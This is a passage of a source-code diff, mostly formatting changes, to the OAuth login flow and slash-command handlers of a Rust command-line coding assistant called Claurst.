         ("api_key".to_string(), true)
@@ -3033,4 +3111,3 @@ fn json_null_or_string(opt: &Option<String>) -> serde_json::Value {
         None => serde_json::Value::Null,
     }
 }
-

--- a/src-rust/crates/cli/src/oauth_flow.rs
+++ b/src-rust/crates/cli/src/oauth_flow.rs
@@ -87,7 +87,8 @@ pub async fn run_oauth_login_flow(login_with_claude_ai: bool) -> anyhow::Result<
         oauth::CONSOLE_AUTHORIZE_URL
     };
     let manual_url = oauth::build_auth_url(&authorize_base, &code_challenge, &state, port, true);
-    let automatic_url = oauth::build_auth_url(&authorize_base, &code_challenge, &state, port, false);
+    let automatic_url =
+        oauth::build_auth_url(&authorize_base, &code_challenge, &state, port, false);
 
     // 4. Print URL and try to open browser
     println!("\nOpening browser for authentication...");
@@ -95,8 +96,9 @@ pub async fn run_oauth_login_flow(login_with_claude_ai: bool) -> anyhow::Result<
     try_open_browser(&automatic_url);
 
     // 5. Wait for auth code (automatic callback OR manual paste)
-    let auth_code =
-        wait_for_auth_code_impl(listener, &state).await.context("OAuth callback failed")?;
+    let auth_code = wait_for_auth_code_impl(listener, &state)
+        .await
+        .context("OAuth callback failed")?;
     debug!("OAuth auth code received");
 
     // 6. Exchange code for tokens
@@ -104,8 +106,8 @@ pub async fn run_oauth_login_flow(login_with_claude_ai: bool) -> anyhow::Result<
         .await
         .context("Token exchange failed")?;
 
-    let expires_at_ms = chrono::Utc::now().timestamp_millis()
-        + (token_resp.expires_in as i64 * 1000);
+    let expires_at_ms =
+        chrono::Utc::now().timestamp_millis() + (token_resp.expires_in as i64 * 1000);
 
     let scopes: Vec<String> = token_resp
         .scope
@@ -116,13 +118,17 @@ pub async fn run_oauth_login_flow(login_with_claude_ai: bool) -> anyhow::Result<
         .collect();
 
     let account_uuid = token_resp
-        .account.as_ref()
+        .account
+        .as_ref()
         .and_then(|a| a.get("uuid").and_then(|v| v.as_str()).map(String::from));
-    let email = token_resp
-        .account.as_ref()
-        .and_then(|a| a.get("email_address").and_then(|v| v.as_str()).map(String::from));
+    let email = token_resp.account.as_ref().and_then(|a| {
+        a.get("email_address")
+            .and_then(|v| v.as_str())
+            .map(String::from)
+    });
     let organization_uuid = token_resp
-        .organization.as_ref()
+        .organization
+        .as_ref()
         .and_then(|o| o.get("uuid").and_then(|v| v.as_str()).map(String::from));
 
     let uses_bearer = scopes.iter().any(|s| s == oauth::CLAUDE_AI_INFERENCE_SCOPE);
@@ -165,7 +171,11 @@ pub async fn run_oauth_login_flow(login_with_claude_ai: bool) -> anyhow::Result<
         bail!("Login succeeded but could not obtain a usable credential")
     };
 
-    Ok(LoginResult { credential, use_bearer_auth, tokens })
+    Ok(LoginResult {
+        credential,
+        use_bearer_auth,
+        tokens,
+    })
 }
 
 // ---- Helpers ----------------------------------------------------------------
@@ -204,17 +214,20 @@ fn try_open_browser(url: &str) {
 }
 
 /// Tiny async HTTP server that captures /callback?code=AUTH_CODE&state=STATE.
-async fn run_callback_server(listener: TcpListener, expected_state: &str) -> anyhow::Result<String> {
-    debug!("OAuth callback server listening on port {}", listener.local_addr()?.port());
+async fn run_callback_server(
+    listener: TcpListener,
+    expected_state: &str,
+) -> anyhow::Result<String> {
+    debug!(
+        "OAuth callback server listening on port {}",
+        listener.local_addr()?.port()
+    );
 
     // Accept exactly one connection (the browser redirect)
-    let (mut socket, _) = tokio::time::timeout(
-        Duration::from_secs(120),
-        listener.accept(),
-    )
-    .await
-    .context("Timeout waiting for browser redirect")?
-    .context("Accept failed")?;
+    let (mut socket, _) = tokio::time::timeout(Duration::from_secs(120), listener.accept())
+        .await
+        .context("Timeout waiting for browser redirect")?
+        .context("Accept failed")?;
 
     // Read the HTTP request line-by-line until the blank line
     let (reader, mut writer) = socket.split();
@@ -351,7 +364,10 @@ async fn create_api_key(access_token: &str) -> anyhow::Result<String> {
         bail!("API key creation failed ({}): {}", status, text);
     }
 
-    let data: CreateApiKeyResponse = resp.json().await.context("Failed to parse API key response")?;
+    let data: CreateApiKeyResponse = resp
+        .json()
+        .await
+        .context("Failed to parse API key response")?;
     data.raw_key.context("Server returned no API key")
 }
 
@@ -392,8 +408,8 @@ pub async fn refresh_oauth_token(tokens: &OAuthTokens) -> anyhow::Result<OAuthTo
     }
 
     let token_resp: TokenExchangeResponse = resp.json().await?;
-    let expires_at_ms = chrono::Utc::now().timestamp_millis()
-        + (token_resp.expires_in as i64 * 1000);
+    let expires_at_ms =
+        chrono::Utc::now().timestamp_millis() + (token_resp.expires_in as i64 * 1000);
 
     let scopes: Vec<String> = token_resp
         .scope

--- a/src-rust/crates/commands/src/lib.rs
+++ b/src-rust/crates/commands/src/lib.rs
@@ -9,9 +9,9 @@ use claurst_core::config::{Config, Settings, Theme};
 use claurst_core::cost::CostTracker;
 use claurst_core::types::Message;
 use std::collections::BTreeMap;
-use std::sync::Arc;
 #[allow(unused_imports)]
 use std::path::PathBuf;
+use std::sync::Arc;
 
 // ---------------------------------------------------------------------------
 // Core trait
@@ -304,10 +304,7 @@ fn generate_keybindings_template() -> anyhow::Result<String> {
             .collect(),
     };
 
-    Ok(format!(
-        "{}\n",
-        serde_json::to_string_pretty(&template)?
-    ))
+    Ok(format!("{}\n", serde_json::to_string_pretty(&template)?))
 }
 
 fn parse_theme(name: &str) -> Option<Theme> {
@@ -389,31 +386,37 @@ fn command_category(name: &str) -> &'static str {
         "clear" | "compact" | "rewind" | "summary" | "export" | "rename" | "branch" | "fork" => {
             "Conversation"
         }
-        "model" | "config" | "theme" | "color" | "vim" | "fast" | "effort"
-        | "voice" | "statusline" | "output-style" | "keybindings"
-        | "privacy-settings" | "rate-limit-options" | "sandbox-toggle" => "Settings",
+        "model" | "config" | "theme" | "color" | "vim" | "fast" | "effort" | "voice"
+        | "statusline" | "output-style" | "keybindings" | "privacy-settings"
+        | "rate-limit-options" | "sandbox-toggle" => "Settings",
         "cost" | "stats" | "usage" | "extra-usage" | "context" | "ctx-viz" => "Usage & Cost",
         "status" | "doctor" | "terminal-setup" | "version" | "update" | "upgrade"
         | "release-notes" => "System",
         "login" | "logout" | "refresh" | "permissions" => "Auth & Permissions",
-        "memory" | "files" | "diff" | "init" | "commit" | "review"
-        | "security-review" => "Project",
+        "memory" | "files" | "diff" | "init" | "commit" | "review" | "security-review" => "Project",
         "mcp" | "hooks" | "ide" | "chrome" => "Integrations",
-        "session" | "resume" | "remote-control" | "remote-env"
-        | "share" | "teleport" => "Sessions & Remote",
+        "session" | "resume" | "remote-control" | "remote-env" | "share" | "teleport" => {
+            "Sessions & Remote"
+        }
         "help" | "exit" | "feedback" | "bug" => "General",
         "think-back" | "thinkback-play" | "thinking" | "plan" | "tasks" => "AI & Thinking",
-        "copy" | "skills" | "agents" | "plugin" | "reload-plugins"
-        | "stickers" | "passes" | "desktop" | "mobile" | "btw" => "Tools & Extras",
+        "copy" | "skills" | "agents" | "plugin" | "reload-plugins" | "stickers" | "passes"
+        | "desktop" | "mobile" | "btw" => "Tools & Extras",
         _ => "Other",
     }
 }
 
 #[async_trait]
 impl SlashCommand for HelpCommand {
-    fn name(&self) -> &str { "help" }
-    fn aliases(&self) -> Vec<&str> { vec!["h", "?"] }
-    fn description(&self) -> &str { "Show available commands and usage information" }
+    fn name(&self) -> &str {
+        "help"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["h", "?"]
+    }
+    fn description(&self) -> &str {
+        "Show available commands and usage information"
+    }
 
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         if !args.is_empty() {
@@ -425,7 +428,11 @@ impl SlashCommand for HelpCommand {
                 } else {
                     format!(
                         "\nAliases: {}",
-                        aliases.iter().map(|a| format!("/{}", a)).collect::<Vec<_>>().join(", ")
+                        aliases
+                            .iter()
+                            .map(|a| format!("/{}", a))
+                            .collect::<Vec<_>>()
+                            .join(", ")
                     )
                 };
                 return CommandResult::Message(format!(
@@ -470,13 +477,18 @@ impl SlashCommand for HelpCommand {
             } else {
                 format!(
                     " ({})",
-                    aliases.iter().map(|a| format!("/{}", a)).collect::<Vec<_>>().join(", ")
+                    aliases
+                        .iter()
+                        .map(|a| format!("/{}", a))
+                        .collect::<Vec<_>>()
+                        .join(", ")
                 )
             };
-            by_cat
-                .entry(cat)
-                .or_default()
-                .push(format!("  /{:<20} {}", format!("{}{}", cmd.name(), alias_str), cmd.description()));
+            by_cat.entry(cat).or_default().push(format!(
+                "  /{:<20} {}",
+                format!("{}{}", cmd.name(), alias_str),
+                cmd.description()
+            ));
         }
 
         let mut output = String::from("Claurst — Slash Commands\n");
@@ -500,9 +512,15 @@ impl SlashCommand for HelpCommand {
 
 #[async_trait]
 impl SlashCommand for ClearCommand {
-    fn name(&self) -> &str { "clear" }
-    fn aliases(&self) -> Vec<&str> { vec!["c", "reset", "new"] }
-    fn description(&self) -> &str { "Clear the conversation history" }
+    fn name(&self) -> &str {
+        "clear"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["c", "reset", "new"]
+    }
+    fn description(&self) -> &str {
+        "Clear the conversation history"
+    }
 
     async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult {
         CommandResult::ClearConversation
@@ -513,8 +531,12 @@ impl SlashCommand for ClearCommand {
 
 #[async_trait]
 impl SlashCommand for CompactCommand {
-    fn name(&self) -> &str { "compact" }
-    fn description(&self) -> &str { "Compact the conversation to reduce token usage" }
+    fn name(&self) -> &str {
+        "compact"
+    }
+    fn description(&self) -> &str {
+        "Compact the conversation to reduce token usage"
+    }
 
     async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult {
         let msg_count = ctx.messages.len();
@@ -538,8 +560,12 @@ impl SlashCommand for CompactCommand {
 
 #[async_trait]
 impl SlashCommand for CostCommand {
-    fn name(&self) -> &str { "cost" }
-    fn description(&self) -> &str { "Show token usage and cost for this session" }
+    fn name(&self) -> &str {
+        "cost"
+    }
+    fn description(&self) -> &str {
+        "Show token usage and cost for this session"
+    }
     fn help(&self) -> &str {
         "Usage: /cost\n\n\
          Shows per-category token counts and the estimated cost for this session.\n\
@@ -561,10 +587,10 @@ impl SlashCommand for CostCommand {
         let cost = tracker.total_cost_usd();
 
         // Per-category cost breakdown.
-        let input_cost    = (input as f64 * pricing.input_per_mtk) / 1_000_000.0;
-        let output_cost   = (output as f64 * pricing.output_per_mtk) / 1_000_000.0;
-        let cc_cost       = (cache_create as f64 * pricing.cache_creation_per_mtk) / 1_000_000.0;
-        let cr_cost       = (cache_read as f64 * pricing.cache_read_per_mtk) / 1_000_000.0;
+        let input_cost = (input as f64 * pricing.input_per_mtk) / 1_000_000.0;
+        let output_cost = (output as f64 * pricing.output_per_mtk) / 1_000_000.0;
+        let cc_cost = (cache_create as f64 * pricing.cache_creation_per_mtk) / 1_000_000.0;
+        let cr_cost = (cache_read as f64 * pricing.cache_read_per_mtk) / 1_000_000.0;
 
         // Pricing info line.
         let pricing_line = format!(
@@ -578,10 +604,12 @@ impl SlashCommand for CostCommand {
         // Cache savings note: how much input cost was avoided by using cache-read
         // instead of re-sending those tokens as normal input.
         let savings = if cache_read > 0 {
-            let saved =
-                (cache_read as f64 * (pricing.input_per_mtk - pricing.cache_read_per_mtk))
-                    / 1_000_000.0;
-            format!("\n  Cache savings:  ${:.4}  ({} tokens served from cache)", saved, cache_read)
+            let saved = (cache_read as f64 * (pricing.input_per_mtk - pricing.cache_read_per_mtk))
+                / 1_000_000.0;
+            format!(
+                "\n  Cache savings:  ${:.4}  ({} tokens served from cache)",
+                saved, cache_read
+            )
         } else {
             String::new()
         };
@@ -619,9 +647,15 @@ impl SlashCommand for CostCommand {
 
 #[async_trait]
 impl SlashCommand for ExitCommand {
-    fn name(&self) -> &str { "exit" }
-    fn aliases(&self) -> Vec<&str> { vec!["quit", "q"] }
-    fn description(&self) -> &str { "Exit Claurst" }
+    fn name(&self) -> &str {
+        "exit"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["quit", "q"]
+    }
+    fn description(&self) -> &str {
+        "Exit Claurst"
+    }
 
     async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult {
         CommandResult::Exit
@@ -632,8 +666,12 @@ impl SlashCommand for ExitCommand {
 
 #[async_trait]
 impl SlashCommand for ModelCommand {
-    fn name(&self) -> &str { "model" }
-    fn description(&self) -> &str { "Show or change the current model" }
+    fn name(&self) -> &str {
+        "model"
+    }
+    fn description(&self) -> &str {
+        "Show or change the current model"
+    }
     fn help(&self) -> &str {
         "Usage: /model [<model-id>]\n\n\
          Without arguments, shows the current model.\n\n\
@@ -650,10 +688,7 @@ impl SlashCommand for ModelCommand {
     async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult {
         let args = args.trim();
         if args.is_empty() {
-            CommandResult::Message(format!(
-                "Current model: {}",
-                ctx.config.effective_model()
-            ))
+            CommandResult::Message(format!("Current model: {}", ctx.config.effective_model()))
         } else {
             // Accept both "provider/model" and bare model names.
             // The config stores the full string (including provider prefix when present)
@@ -679,9 +714,15 @@ impl SlashCommand for ModelCommand {
 
 #[async_trait]
 impl SlashCommand for ConfigCommand {
-    fn name(&self) -> &str { "config" }
-    fn aliases(&self) -> Vec<&str> { vec!["settings"] }
-    fn description(&self) -> &str { "Show or modify configuration settings" }
+    fn name(&self) -> &str {
+        "config"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["settings"]
+    }
+    fn description(&self) -> &str {
+        "Show or modify configuration settings"
+    }
 
     async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult {
         let args = args.trim();
@@ -700,10 +741,9 @@ impl SlashCommand for ConfigCommand {
                     "output-style = {}",
                     current_output_style_name(&ctx.config)
                 )),
-                "model" => CommandResult::Message(format!(
-                    "model = {}",
-                    ctx.config.effective_model()
-                )),
+                "model" => {
+                    CommandResult::Message(format!("model = {}", ctx.config.effective_model()))
+                }
                 "permission-mode" | "permission_mode" => CommandResult::Message(format!(
                     "permission-mode = {:?}",
                     ctx.config.permission_mode
@@ -717,7 +757,8 @@ impl SlashCommand for ConfigCommand {
                 "model" => {
                     let mut new_config = ctx.config.clone();
                     new_config.model = None;
-                    if let Err(err) = save_settings_mutation(|settings| settings.config.model = None)
+                    if let Err(err) =
+                        save_settings_mutation(|settings| settings.config.model = None)
                     {
                         return CommandResult::Error(format!(
                             "Failed to save configuration: {}",
@@ -788,8 +829,7 @@ impl SlashCommand for ConfigCommand {
                 }
 
                 let mut new_config = ctx.config.clone();
-                new_config.output_style =
-                    (normalized != "default").then(|| normalized.clone());
+                new_config.output_style = (normalized != "default").then(|| normalized.clone());
                 if let Err(err) = save_settings_mutation(|settings| {
                     settings.config.output_style =
                         (normalized != "default").then(|| normalized.clone());
@@ -812,10 +852,7 @@ impl SlashCommand for ConfigCommand {
                 }) {
                     return CommandResult::Error(format!("Failed to save configuration: {}", err));
                 }
-                CommandResult::ConfigChangeMessage(
-                    new_config,
-                    format!("Model set to {}.", value),
-                )
+                CommandResult::ConfigChangeMessage(new_config, format!("Model set to {}.", value))
             }
             "permission-mode" | "permission_mode" => {
                 let mode = match value.trim().to_lowercase().as_str() {
@@ -856,8 +893,12 @@ impl SlashCommand for ConfigCommand {
 
 #[async_trait]
 impl SlashCommand for ColorCommand {
-    fn name(&self) -> &str { "color" }
-    fn description(&self) -> &str { "Set or show the prompt bar color for this session" }
+    fn name(&self) -> &str {
+        "color"
+    }
+    fn description(&self) -> &str {
+        "Set or show the prompt bar color for this session"
+    }
     fn help(&self) -> &str {
         "Usage: /color [<name|#RRGGBB|default>]\n\n\
          Sets the accent color for the prompt bar in this session.\n\
@@ -884,10 +925,11 @@ impl SlashCommand for ColorCommand {
             None
         } else {
             let known_colors = [
-                "red", "green", "blue", "yellow", "cyan", "magenta",
-                "white", "orange", "purple", "pink", "gray", "grey",
+                "red", "green", "blue", "yellow", "cyan", "magenta", "white", "orange", "purple",
+                "pink", "gray", "grey",
             ];
-            let is_hex = color.starts_with('#') && (color.len() == 4 || color.len() == 7)
+            let is_hex = color.starts_with('#')
+                && (color.len() == 4 || color.len() == 7)
                 && color[1..].chars().all(|c| c.is_ascii_hexdigit());
             if !is_hex && !known_colors.contains(&color.to_lowercase().as_str()) {
                 return CommandResult::Error(format!(
@@ -913,8 +955,12 @@ impl SlashCommand for ColorCommand {
 
 #[async_trait]
 impl SlashCommand for ThemeCommand {
-    fn name(&self) -> &str { "theme" }
-    fn description(&self) -> &str { "Show or change the current theme" }
+    fn name(&self) -> &str {
+        "theme"
+    }
+    fn description(&self) -> &str {
+        "Show or change the current theme"
+    }
     fn help(&self) -> &str {
         "Usage: /theme [default|dark|light]\n\
          Without arguments, shows the active theme. With an argument, updates the theme for this and future sessions."
@@ -930,15 +976,12 @@ impl SlashCommand for ThemeCommand {
         }
 
         let Some(theme) = parse_theme(args) else {
-            return CommandResult::Error(
-                "Theme must be one of: default, dark, light".to_string(),
-            );
+            return CommandResult::Error("Theme must be one of: default, dark, light".to_string());
         };
 
         let mut new_config = ctx.config.clone();
         new_config.theme = theme.clone();
-        if let Err(err) = save_settings_mutation(|settings| settings.config.theme = theme.clone())
-        {
+        if let Err(err) = save_settings_mutation(|settings| settings.config.theme = theme.clone()) {
             return CommandResult::Error(format!("Failed to save theme: {}", err));
         }
 
@@ -953,8 +996,12 @@ impl SlashCommand for ThemeCommand {
 
 #[async_trait]
 impl SlashCommand for OutputStyleCommand {
-    fn name(&self) -> &str { "output-style" }
-    fn description(&self) -> &str { "Show or switch the current output style" }
+    fn name(&self) -> &str {
+        "output-style"
+    }
+    fn description(&self) -> &str {
+        "Show or switch the current output style"
+    }
     fn help(&self) -> &str {
         "Usage: /output-style [style-name]\n\n\
          With no argument: list available styles and show the current one.\n\
@@ -992,8 +1039,7 @@ impl SlashCommand for OutputStyleCommand {
         let mut new_config = ctx.config.clone();
         new_config.output_style = (normalized != "default").then(|| normalized.clone());
         if let Err(err) = save_settings_mutation(|settings| {
-            settings.config.output_style =
-                (normalized != "default").then(|| normalized.clone());
+            settings.config.output_style = (normalized != "default").then(|| normalized.clone());
         }) {
             return CommandResult::Error(format!("Failed to save configuration: {}", err));
         }
@@ -1012,8 +1058,12 @@ impl SlashCommand for OutputStyleCommand {
 
 #[async_trait]
 impl SlashCommand for KeybindingsCommand {
-    fn name(&self) -> &str { "keybindings" }
-    fn description(&self) -> &str { "Create or open ~/.claurst/keybindings.json" }
+    fn name(&self) -> &str {
+        "keybindings"
+    }
+    fn description(&self) -> &str {
+        "Create or open ~/.claurst/keybindings.json"
+    }
 
     async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult {
         let config_dir = Settings::config_dir();
@@ -1078,8 +1128,12 @@ impl SlashCommand for KeybindingsCommand {
 
 #[async_trait]
 impl SlashCommand for PrivacySettingsCommand {
-    fn name(&self) -> &str { "privacy-settings" }
-    fn description(&self) -> &str { "Open Claurst privacy settings" }
+    fn name(&self) -> &str {
+        "privacy-settings"
+    }
+    fn description(&self) -> &str {
+        "Open Claurst privacy settings"
+    }
 
     async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult {
         let url = "https://claude.ai/settings/data-privacy-controls";
@@ -1095,15 +1149,18 @@ impl SlashCommand for PrivacySettingsCommand {
 
 #[async_trait]
 impl SlashCommand for VersionCommand {
-    fn name(&self) -> &str { "version" }
-    fn aliases(&self) -> Vec<&str> { vec!["v"] }
-    fn description(&self) -> &str { "Show version information" }
+    fn name(&self) -> &str {
+        "version"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["v"]
+    }
+    fn description(&self) -> &str {
+        "Show version information"
+    }
 
     async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult {
-        CommandResult::Message(format!(
-            "Claurst v{}",
-            claurst_core::constants::APP_VERSION
-        ))
+        CommandResult::Message(format!("Claurst v{}", claurst_core::constants::APP_VERSION))
     }
 }
 
@@ -1111,9 +1168,15 @@ impl SlashCommand for VersionCommand {
 
 #[async_trait]
 impl SlashCommand for ResumeCommand {
-    fn name(&self) -> &str { "resume" }
-    fn aliases(&self) -> Vec<&str> { vec!["r", "continue"] }
-    fn description(&self) -> &str { "Resume a previous conversation" }
+    fn name(&self) -> &str {
+        "resume"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["r", "continue"]
+    }
+    fn description(&self) -> &str {
+        "Resume a previous conversation"
+    }
 
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         if args.is_empty() {
@@ -1123,10 +1186,7 @@ impl SlashCommand for ResumeCommand {
             }
             let mut output = String::from("Recent sessions:\n\n");
             for (i, session) in sessions.iter().take(10).enumerate() {
-                let title = session
-                    .title
-                    .as_deref()
-                    .unwrap_or("(untitled)");
+                let title = session.title.as_deref().unwrap_or("(untitled)");
                 let id_short = &session.id[..session.id.len().min(8)];
                 output.push_str(&format!(
                     "  {}. {} - {} ({} messages)\n",
@@ -1141,11 +1201,9 @@ impl SlashCommand for ResumeCommand {
         } else {
             match claurst_core::history::load_session(args.trim()).await {
                 Ok(session) => CommandResult::ResumeSession(session),
-                Err(e) => CommandResult::Error(format!(
-                    "Failed to load session {}: {}",
-                    args.trim(),
-                    e
-                )),
+                Err(e) => {
+                    CommandResult::Error(format!("Failed to load session {}: {}", args.trim(), e))
+                }
             }
         }
     }
@@ -1155,8 +1213,12 @@ impl SlashCommand for ResumeCommand {
 
 #[async_trait]
 impl SlashCommand for StatusCommand {
-    fn name(&self) -> &str { "status" }
-    fn description(&self) -> &str { "Show comprehensive system and session status" }
+    fn name(&self) -> &str {
+        "status"
+    }
+    fn description(&self) -> &str {
+        "Show comprehensive system and session status"
+    }
 
     async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult {
         // Auth status
@@ -1242,8 +1304,12 @@ impl SlashCommand for StatusCommand {
 
 #[async_trait]
 impl SlashCommand for DiffCommand {
-    fn name(&self) -> &str { "diff" }
-    fn description(&self) -> &str { "Show git diff of changes in the working directory" }
+    fn name(&self) -> &str {
+        "diff"
+    }
+    fn description(&self) -> &str {
+        "Show git diff of changes in the working directory"
+    }
     fn help(&self) -> &str {
         "Usage: /diff [--stat|--staged|<ref>]\n\n\
          Shows git diff output for the current working directory.\n\n\
@@ -1314,8 +1380,12 @@ impl SlashCommand for DiffCommand {
 
 #[async_trait]
 impl SlashCommand for MemoryCommand {
-    fn name(&self) -> &str { "memory" }
-    fn description(&self) -> &str { "View, edit, or clear AGENTS.md memory files" }
+    fn name(&self) -> &str {
+        "memory"
+    }
+    fn description(&self) -> &str {
+        "View, edit, or clear AGENTS.md memory files"
+    }
     fn help(&self) -> &str {
         "Usage: /memory [edit|clear] [global]\n\n\
          Shows the content of AGENTS.md files that provide project context to Claurst.\n\
@@ -1351,7 +1421,10 @@ impl SlashCommand for MemoryCommand {
 
         // ---- /memory edit [global|project] ------------------------------------
         if cmd == "edit" || cmd.starts_with("edit ") {
-            let target_hint = cmd.strip_prefix("edit").map(|s| s.trim()).unwrap_or("project");
+            let target_hint = cmd
+                .strip_prefix("edit")
+                .map(|s| s.trim())
+                .unwrap_or("project");
             let target = match target_hint {
                 "global" => {
                     // Ensure global dir exists
@@ -1392,11 +1465,10 @@ impl SlashCommand for MemoryCommand {
             } else if let Ok(ed) = std::env::var("EDITOR") {
                 format!("Using $EDITOR=\"{}\".", ed)
             } else {
-                "To use a different editor, set the $EDITOR or $VISUAL environment variable.".to_string()
+                "To use a different editor, set the $EDITOR or $VISUAL environment variable."
+                    .to_string()
             };
-            let spawn_result = std::process::Command::new(&editor)
-                .arg(&target)
-                .status();
+            let spawn_result = std::process::Command::new(&editor).arg(&target).status();
             return match spawn_result {
                 Ok(_) => CommandResult::Message(format!(
                     "Opened {} in your editor.\n{}",
@@ -1405,14 +1477,20 @@ impl SlashCommand for MemoryCommand {
                 )),
                 Err(e) => CommandResult::Message(format!(
                     "Could not launch '{}': {}. Edit {} manually.\n{}",
-                    editor, e, target.display(), editor_hint
+                    editor,
+                    e,
+                    target.display(),
+                    editor_hint
                 )),
             };
         }
 
         // ---- /memory clear [global|project] -----------------------------------
         if cmd == "clear" || cmd.starts_with("clear ") {
-            let target_hint = cmd.strip_prefix("clear").map(|s| s.trim()).unwrap_or("project");
+            let target_hint = cmd
+                .strip_prefix("clear")
+                .map(|s| s.trim())
+                .unwrap_or("project");
             let (label, target) = match target_hint {
                 "global" => ("global (~/.claurst/AGENTS.md)", global_path.clone()),
                 _ => {
@@ -1436,9 +1514,9 @@ impl SlashCommand for MemoryCommand {
                     label,
                     target.display()
                 )),
-                Err(e) => CommandResult::Error(format!(
-                    "Failed to clear {}: {}", target.display(), e
-                )),
+                Err(e) => {
+                    CommandResult::Error(format!("Failed to clear {}: {}", target.display(), e))
+                }
             };
         }
 
@@ -1462,7 +1540,11 @@ impl SlashCommand for MemoryCommand {
                             lines = lines,
                             chars = chars,
                             content = if content.len() > 2000 {
-                                format!("{}…\n(truncated — file is {} chars)", &content[..2000], chars)
+                                format!(
+                                    "{}…\n(truncated — file is {} chars)",
+                                    &content[..2000],
+                                    chars
+                                )
                             } else {
                                 content.clone()
                             }
@@ -1470,7 +1552,9 @@ impl SlashCommand for MemoryCommand {
                     }
                     Err(e) => output.push_str(&format!(
                         "\n[{label}] — Error reading {}: {}\n",
-                        path.display(), e, label = label
+                        path.display(),
+                        e,
+                        label = label
                     )),
                 }
             }
@@ -1480,7 +1564,7 @@ impl SlashCommand for MemoryCommand {
             output.push_str(
                 "\nNo AGENTS.md files found.\n\
                  Use /init to create one in the current project.\n\
-                 Use /memory edit to create and open a memory file."
+                 Use /memory edit to create and open a memory file.",
             );
         } else {
             output.push_str(
@@ -1488,7 +1572,7 @@ impl SlashCommand for MemoryCommand {
                  /memory edit          — edit project AGENTS.md\n\
                  /memory edit global   — edit global ~/.claurst/AGENTS.md\n\
                  /memory clear         — clear project AGENTS.md\n\
-                 /memory clear global  — clear global AGENTS.md"
+                 /memory clear global  — clear global AGENTS.md",
             );
         }
 
@@ -1500,10 +1584,18 @@ impl SlashCommand for MemoryCommand {
 
 #[async_trait]
 impl SlashCommand for BugCommand {
-    fn name(&self) -> &str { "feedback" }
-    fn aliases(&self) -> Vec<&str> { vec!["bug"] }
-    fn description(&self) -> &str { "Submit feedback about Claurst" }
-    fn help(&self) -> &str { "Usage: /feedback [report]" }
+    fn name(&self) -> &str {
+        "feedback"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["bug"]
+    }
+    fn description(&self) -> &str {
+        "Submit feedback about Claurst"
+    }
+    fn help(&self) -> &str {
+        "Usage: /feedback [report]"
+    }
 
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         let report = args.trim();
@@ -1525,8 +1617,12 @@ impl SlashCommand for BugCommand {
 
 #[async_trait]
 impl SlashCommand for UsageCommand {
-    fn name(&self) -> &str { "usage" }
-    fn description(&self) -> &str { "Show API usage, quotas, and rate limit status" }
+    fn name(&self) -> &str {
+        "usage"
+    }
+    fn description(&self) -> &str {
+        "Show API usage, quotas, and rate limit status"
+    }
     fn help(&self) -> &str {
         "Usage: /usage\n\n\
          Shows current session API usage and account quota information.\n\
@@ -1587,9 +1683,15 @@ impl SlashCommand for UsageCommand {
 
 #[async_trait]
 impl SlashCommand for PluginCommand {
-    fn name(&self) -> &str { "plugin" }
-    fn aliases(&self) -> Vec<&str> { vec!["plugins"] }
-    fn description(&self) -> &str { "Manage plugins" }
+    fn name(&self) -> &str {
+        "plugin"
+    }
+    fn aliases(&self) -> Vec<&str> {
+        vec!["plugins"]
+    }
+    fn description(&self) -> &str {
+        "Manage plugins"
+    }
     fn help(&self) -> &str {
         "Usage: /plugin [list|info <name>|enable <name>|disable <name>|install <path>|reload]\n\
          Manage Claurst plugins.\n\n\
@@ -1608,9 +1710,7 @@ impl SlashCommand for PluginCommand {
 
         // Helper: prefer the already-loaded global registry, falling back to a
         // fresh disk scan so the command still works without the global being set.
-        async fn get_registry(
-            project_dir: &std::path::Path,
-        ) -> claurst_plugins::PluginRegistry {
+        async fn get_registry(project_dir: &std::path::Path) -> claurst_plugins::PluginRegistry {
             if let Some(global) = claurst_plugins::global_plugin_registry() {
                 let mut reg = claurst_plugins::PluginRegistry::new();
                 for p in global.all() {
@@ -1691,9 +1791,7 @@ impl SlashCommand for PluginCommand {
                 )
             }
             claurst_plugins::PluginSubCommand::Install(path) => {
-                let result = claurst_plugins::install_plugin_from_path(
-                    std::path::Path::new(&path),
-                );
+                let result = claurst_plugins::install_plugin_from_path(std::path::Path::new(&path));
                 match result {
                     Ok(name) => CommandResult::Message(format!(
                         "Plugin '{}' installed successfully. Run `/plugin reload` to activate it.",
@@ -1708,9 +1806,8 @@ impl SlashCommand for PluginCommand {
                     claurst_plugins::reload_plugins(&old_registry, &project_dir, &[]).await;
                 CommandResult::Message(claurst_plugins::format_reload_summary(&new_registry, &diff))
             }
-            claurst_plugins::PluginSubCommand::Help => {
-                CommandResult::Message(
-                    "Plugin commands:\n\
+            claurst_plugins::PluginSubCommand::Help => CommandResult::Message(
+                "Plugin commands:\n\
                      /plugin              — list all installed plugins\n\
                      /plugin list         — list all installed plugins\n\
                      /plugin info <name>  — show plugin details\n\
@@ -1718,9 +1815,8 @@ impl SlashCommand for PluginCommand {
                      /plugin disable <name>  — disable a plugin\n\
                      /plugin install <path>  — install plugin from local path\n\
                      /plugin reload       — reload plugins from disk"
-                        .to_string(),
-                )
-            }
+                    .to_string(),
+            ),
         }
     }
 }
@@ -1729,8 +1825,12 @@ impl SlashCommand for PluginCommand {
 
 #[async_trait]
 impl SlashCommand for ReloadPluginsCommand {
-    fn name(&self) -> &str { "reload-plugins" }
-    fn description(&self) -> &str { "Reload all plugins without restarting" }
+    fn name(&self) -> &str {
